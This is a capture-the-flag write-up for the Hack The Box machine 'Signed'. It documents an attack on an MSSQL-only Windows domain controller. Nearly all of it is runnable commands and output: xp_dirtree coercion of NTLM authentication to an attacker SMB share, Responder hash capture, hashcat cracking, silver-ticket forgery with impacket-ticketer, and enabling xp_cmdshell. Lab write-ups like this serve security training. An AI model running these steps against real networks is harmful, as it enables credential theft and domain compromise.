Signed - Hack The Box
Platform: Windows
IP: 10.129.203.27
Difficulty: Medium
Author: NoSec
wanna go deeper? unlock short videos & early root chains by joining backdoor crew
💀 join the backdoor crewRecon
nmap -sVC 10.129.203.27
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-11 21:41 CEST
Nmap scan report for 10.129.203.27
Host is up (0.029s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.203.27:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.203.27:1433:
| Target_Name: SIGNED
| NetBIOS_Domain_Name: SIGNED
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: SIGNED.HTB
| DNS_Computer_Name: DC01.SIGNED.HTB
| DNS_Tree_Name: SIGNED.HTB
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-10-11T19:42:23+00:00; +23s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-11T19:16:20
|_Not valid after: 2055-10-11T19:16:20
Host script results:
|_clock-skew: mean: 22s, deviation: 0s, median: 22s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.77 seconds
Initial Access
MSSQL Initial Credentials
Initial credentials provided:
Username: scott
Password: Sm230#C5NatH
Connect to MSSQL:
impacket-mssqlclient scott:'Sm230#C5NatH'@10.129.203.27
Logged in as guest user with minimal privileges.
NTLM Hash Capture & Cracking
Responder Setup
Since MSSQL allows extended stored procedures, we can force the server to authenticate to our machine:
# Start Responder
sudo responder -I tun0
Coerce Authentication from MSSQL
Using xp_dirtree to trigger an SMB connection from the SQL Server:
EXEC xp_dirtree '\\10.10.14.96\share';
Captured NTLMv2 Hash
Responder captured the authentication attempt:
[SMB] NTLMv2-SSP Client : 10.129.170.123
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:9bade5d933cee1b4:091BE064ACDC3C5EF68AFAAA<HASH>
Crack the Hash
hashcat -m 5600 mssqlsvc.hash /usr/share/wordlists/rockyou.txt
Cracked Password: pur<PASS>
Authenticate with Domain Credentials
impacket-mssqlclient -windows-auth SIGNED/mssqlsvc:'pur<PASS>'@10.129.203.27
Still logged in as guest user, but now we have valid domain credentials for mssqlsvc.
SQL Server Principals
SELECT r.name AS role_name, mp.name AS member_name FROM sys.server_role_members srm JOIN sys.server_principals r ON srm.role_principal_id=r.principal_id JOIN sys.server_principals mp ON srm.member_principal_id=mp.principal_id WHERE r.name='sysadmin';
Notable finding: SIGNED\IT group has sysadmin role!
SELECT srv.server_id, srv.name FROM sys.servers srv WHERE srv.name IN ('DC01',@@SERVERNAME);
Found linked server: DC01
Privilege Escalation Path
Domain SID Extraction
SELECT SUSER_SID();
SID (hex): b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'
Converting to readable format:
- Domain SID: S-1-5-21-4089266779-11675<SID>
- User RID: 1103
IT Group SID Discovery
SELECT name, sid FROM sys.server_principals WHERE name = 'SIGNED\IT';
IT Group SID: b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'
- IT Group RID: 1105
Silver Ticket Attack
Prerequisites
For Silver Ticket generation, we need:
1. ✅ Service account NTLM hash (mssqlsvc)
2. ✅ Domain SID
3. ✅ Target user (Administrator - RID 500)
4. ✅ Service Principal Name (SPN)
Calculate NTLM Hash
python3 -c 'import hashlib; print(hashlib.new("md4", "purPL<PASS>.encode("utf-16le")).hexdigest())'
NTLM Hash: ef699384c3285c5<HASH>
Critical Discovery: IT Group Membership
The key to success was including the IT group RID (1105) in the ticket's group memberships, since SIGNED\IT has sysadmin privileges on MSSQL.
Generate Silver Ticket
impacket-ticketer \
-nthash ef699384c3285c5<HASH> \
-domain SIGNED.HTB \
-domain-sid S-1-5-21-4089266779-1167590040-2748827309 \
-user-id 500 \
-groups 512,1105 \
-spn MSSQLSvc/DC01.SIGNED.HTB:1433 \
Administrator
Key Parameters:
- -user-id 500: Built-in Administrator RID
- -groups 512,1105: Domain Admins (512) + IT Group (1105)
- -spn: Service Principal Name for MSSQL
Export and Authenticate
export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient -k DC01.SIGNED.HTB
Success! Authenticated as SIGNED\Administrator with dbo privileges (not guest).
User Flag
Verify Privileges
SELECT IS_SRVROLEMEMBER('sysadmin');
-- Returns: 1 (True)
Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Read User Flag
EXEC xp_cmdshell 'type C:\Users\mssqlsvc\Desktop\user.txt';
Key Takeaways
- Silver Ticket attacks can forge service tickets without contacting the KDC
- Group membership in the ticket's PAC is critical - the IT group RID (1105) was essential for sysadmin access
- Only MSSQL port was open, making this a pure database exploitation challenge
- Domain SID must be correct for the ticket to be accepted
- xp_dirtree can be used to coerce NTLM authentication and capture hashes via Responder
- Even with limited initial access (
guestuser), privilege escalation is possible through Kerberos ticket forgery
Tools Used
nmap- Port scanning and service enumerationResponder- NTLM hash capturehashcat- Password crackingimpacket-mssqlclient- MSSQL client with Kerberos supportimpacket-ticketer- Silver Ticket generation- Python - NTLM hash calculation
References
- Impacket Silver Ticket Documentation
- Active Directory Kerberos Authentication
- HackTheBox Scrambled Machine (Similar Silver Ticket technique)
🔐 Root part is only available in the private Telegram group while the box is active in Season 8. 👉 Join for the full writeup, extra tips and exclusive content: 📡 https://t.me/nosecpwn
☕ invite me for a coffee so i don’t fall asleep writing the next writeup
💻 support nosec